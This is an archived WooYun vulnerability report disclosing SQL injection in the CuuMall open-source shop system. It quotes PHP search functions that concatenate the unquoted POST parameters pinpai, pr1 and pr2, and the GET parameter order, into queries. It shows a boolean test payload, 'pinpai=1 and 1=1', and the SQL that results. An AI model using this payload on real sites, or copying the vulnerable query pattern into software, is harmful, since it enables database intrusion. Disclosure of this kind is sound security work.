当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-077934

漏洞标题:CuuMall免费开源商城系统 sql多处注入

相关厂商:cuumall.com

漏洞作者: menmen519

提交时间:2014-10-02 10:18

修复时间:2014-12-31 10:20

公开时间:2014-12-31 10:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-02: 细节已通知厂商并且等待厂商处理中
2014-10-09: 厂商已经确认,细节仅向厂商公开
2014-10-12: 细节向第三方安全合作伙伴开放
2014-12-03: 细节向核心白帽子及相关领域专家公开
2014-12-13: 细节向普通白帽子公开
2014-12-23: 细节向实习白帽子公开
2014-12-31: 细节向公众公开

简要描述:

CuuMall免费开源商城系统 sql多处注入

详细说明:

直接看代码:
SearchAction.class.php(71-109):

public function Exsearch( )
{
$pinpai = $_POST['pinpai'];
$pr1 = $_POST['pr1'];
$pr2 = $_POST['pr2'];
$key_word = $_POST['key_word'];
if ( $pinpai == 0 )
{
$pinpai = "";
}
if ( $pinpai != "" )
{
$sql1 = "pinpai=".$pinpai." and ";
}
else
{
$sql1 = "";
}
if ( $pr1 != "" )
{
$sql2 = "memprice>".$pr1." and ";
}
else
{
$sql2 = "";
}
if ( $pr2 != "" )
{
$sql3 = "memprice<".$pr2." and ";
}
else
{
$sql3 = "";
}
$title = c( "MALLTITLE" )."-".$key_word;
$this->assign( "title", $title );
$header = a( "Header" );
$header->index( );
$list = new Model( "produc" );
import( "ORG.Util.Page" );
$count = $list->where( $sql1.$sql2.$sql3."title like '%".$key_word."%' and body like '%".$key_word."%'" )->count( );
$page = new Page( $count, 24 );


发现了没有这里的
$pinpai $pr1 $pr2 都不在引号里面 我们做一个测试
url:
http://192.168.10.70/cuumall_v2.3/v2.3/mall_upload/index.php/home/search/Exsearch
postdata:
pinpai=1 and 1=1&pr1=1&pr2=2
访问之后抓取sql语句:
SELECT COUNT(*) AS tp_count FROM `cuu_produc` WHERE pinpai=1 and 1=1 and memprice>1 and memprice<2 and title like '%%' and body like '%%' LIMIT 1
看到了没有1=1 完全进入到sql语句中间
我们在看下一个 :
还是这个文件:
135行 172:

public function px( )
{
$order = $_GET['order'];
$title = c( "MALLTITLE" );
$this->assign( "title", $title );
$header = a( "Header" );
$header->index( );
$list = new Model( "produc" );
import( "ORG.Util.Page" );
if ( $order == "addtime" )
{
$count = $list->count( );
}
else
{
$count = $list->where( $order."=1" )->count( );
}
$page = new Page( $count, 24 );
$show = $page->show( );
if ( $order == "addtime" )
{
$pro = $list->order( $order." desc" )->limit( $page->firstRow.",".$page->listRows )->select( );
}
else
{
$pro = $list->where( $order."=1" )->order( "addtime desc" )->limit( $page->firstRow.",".$page->listRows )->select( );
}
$pro = $this->bakimg( $pro );
$this->assign( "page", $show );
$this->assign( "pro", $pro );
$lm = new Model( "lanmu_one" );
$d_lm = $lm->select( );
$this->assign( "d_lm", $d_lm );
$pp = $this->pinpai( );
$this->assign( "pp", $pp );
$this->display( "Home:searchlist" );
$bu = new ButtomAction( );
$bu->Index( );


看到了没有$order = $_GET['order']; 没有做处理
$count = $list->where( $order."=1" )->count( );
原理一样,这里就不演示了

漏洞证明:

修复方案:

版权声明:转载请注明来源 menmen519@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-10-09 13:39

厂商回复:

感谢

最新状态:

暂无